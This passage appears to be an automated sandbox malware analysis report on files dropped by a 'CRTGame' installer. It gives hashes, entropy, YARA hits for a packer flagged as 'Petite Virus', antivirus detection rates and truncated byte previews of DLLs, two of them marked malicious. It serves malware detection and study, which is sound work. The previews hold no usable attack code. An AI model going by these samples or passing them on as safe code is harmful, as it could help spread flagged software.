                                                                        Entropy (8bit):6.767152008521429
                                                                        Encrypted:false
                                                                        SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                        MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                        SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                        SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                        SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmp, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):18966
                                                                        Entropy (8bit):7.620111275837424
                                                                        Encrypted:false
                                                                        SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                        MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                        SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                        SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                        SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmp, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                        Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):648384
                                                                        Entropy (8bit):6.666474522542094
                                                                        Encrypted:false
                                                                        SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                        MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                        SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                        SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                        SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:Unicode text, UTF-8 text
                                                                        Category:dropped
                                                                        Size (bytes):1059
                                                                        Entropy (8bit):5.1208137218866945
                                                                        Encrypted:false
                                                                        SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                        MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                        SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                        SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                        SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                        Malicious:false
                                                                        Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):62478
                                                                        Entropy (8bit):6.063363187934607
                                                                        Encrypted:false
                                                                        SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                        MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                        SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                        SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                        SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):11532
                                                                        Entropy (8bit):7.219753259626605
                                                                        Encrypted:false
                                                                        SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                        MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                        SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                        SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                        SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                        Preview:MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite...............*..............`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\..*.S...s..$..........o..y..........,.........-..X.....v.M1..*'...5R.4..8k!..q.=*BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk*...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z.*.).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):26126
                                                                        Entropy (8bit):6.048294343792499
                                                                        Encrypted:false
                                                                        SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                        MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                        SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                        SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                        SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):967168
                                                                        Entropy (8bit):6.500850562754145
                                                                        Encrypted:false
                                                                        SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                        MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                        SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                        SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                        SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):227328
                                                                        Entropy (8bit):6.641153481093122
                                                                        Encrypted:false
                                                                        SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                        MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                        SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                        SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                        SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):512014
                                                                        Entropy (8bit):6.566561154468342
                                                                        Encrypted:false
                                                                        SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                        MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                        SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                        SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                        SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):26526
                                                                        Entropy (8bit):4.600837395607617
                                                                        Encrypted:false
                                                                        SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                        MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                        SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                        SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                        SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                        Malicious:false
                                                                        Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):906766
                                                                        Entropy (8bit):6.450201653594769
                                                                        Encrypted:false
                                                                        SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
                                                                        MD5:AF785965AB0BF2474B3DD6E53DA2F368
                                                                        SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
                                                                        SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
                                                                        SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..|;.......<..................@..B........................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):197646
                                                                        Entropy (8bit):6.1570532273946625
                                                                        Encrypted:false
                                                                        SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                        MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                        SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                        SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                        SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):35588
                                                                        Entropy (8bit):7.817557274117395
                                                                        Encrypted:false
                                                                        SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                        MD5:58521D1AC2C588B85642354F6C0C7812
                                                                        SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                        SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                        SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmp, Author: Joe Security
                                                                        Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):149845
                                                                        Entropy (8bit):7.893881970959476
                                                                        Encrypted:false
                                                                        SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                        MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                        SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                        SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                        SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmp, Author: Joe Security
                                                                        Preview:MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):22542
                                                                        Entropy (8bit):5.5875455203930615
                                                                        Encrypted:false
                                                                        SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                        MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                        SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                        SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                        SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):19008
                                                                        Entropy (8bit):7.672481244971812
                                                                        Encrypted:false
                                                                        SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                        MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                        SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                        SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                        SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                        Malicious:false
                                                                        Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):36752
                                                                        Entropy (8bit):7.780431937344781
                                                                        Encrypted:false
                                                                        SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                        MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                        SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                        SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                        SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                        Malicious:false
